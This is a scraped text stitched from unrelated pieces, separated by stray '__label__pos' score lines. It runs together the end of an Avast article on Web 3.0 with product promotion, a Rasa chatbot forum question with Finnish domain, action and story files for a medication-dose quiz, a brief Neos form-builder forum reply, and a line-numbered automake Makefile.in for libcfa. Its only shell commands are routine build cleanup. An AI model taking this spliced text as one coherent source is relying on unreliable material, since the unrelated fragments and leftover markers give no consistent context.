subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option domain-name-servers 114.114.114.114;
option subnet-mask 255.255.255.0;
range dynamic-bootp 192.168.1.100 192.168.1.254;
default-lease-time 21600;
max-lease-time 43200;
next-server 192.168.1.7;
class "pxeclients" {
match if substring (option vendor-class-identifier, 0, 9) = "PXEClient";
if option pxe-system-type = 00:02 {
filename "ia64/elilo.efi";
} else if option pxe-system-type = 00:06 {
filename "grub/grub-x86.efi";
} else if option pxe-system-type = 00:07 {
filename "grub/grub-x86_64.efi";
} else if option pxe-system-type = 00:09 {
filename "grub/grub-x86_64.efi";
} else {
filename "pxelinux.0";
}
}
}
# group for Cobbler DHCP tag: default
group {
host generic1 {
hardware ethernet 00:50:56:3E:F0:C6;
fixed-address 192.168.1.163;
option host-name "Jaking-custom";
option subnet-mask 255.255.255.0;
option routers 192.168.1.1;
filename "/pxelinux.0";
next-server 192.168.1.7;
}
}
#多了以上自定义配置
开机,自动安装指定系统
直接安装无需等待,并且已经预先设置网络相关参数。
输入 root 123456(服务端定义好的密码) 登录系统:
MAC 地址为 00:50:56:3E:F0:C6 的系统获取到了指定的 IP 192.168.1.163
本文原创地址:https://www.linuxprobe.com/cobbler-customize-system.html编辑:public,审核员:逄增宝
|
__label__pos
| 0.544684 |
WebAIM - Web Accessibility In Mind
E-mail List Archives
Re: does TH scope go along with TH span?
for
From: Simius Puer
Date: Nov 24, 2009 9:35AM
That's great Geof - thanks for the feedback. Any other AT users with input
on/experience with the summary attribute?
I'm not surprised that you haven't run into the attribute being used very
often - it's not a well known one and it's often misunderstood. The
replication of the text should not really happen if the guidelines are
followed as the summary should be both brief and descriptive of the
structure of the table - not something that should really be included in the
visual text too, but I do see where you are coming from.
The problem you mentioned about abuse of alt tags on images is a commonly
caused by a CMS has been used and either mis-configured or mis-understood by
it's users. Replication of the text is the result.
|
__label__pos
| 0.610586 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.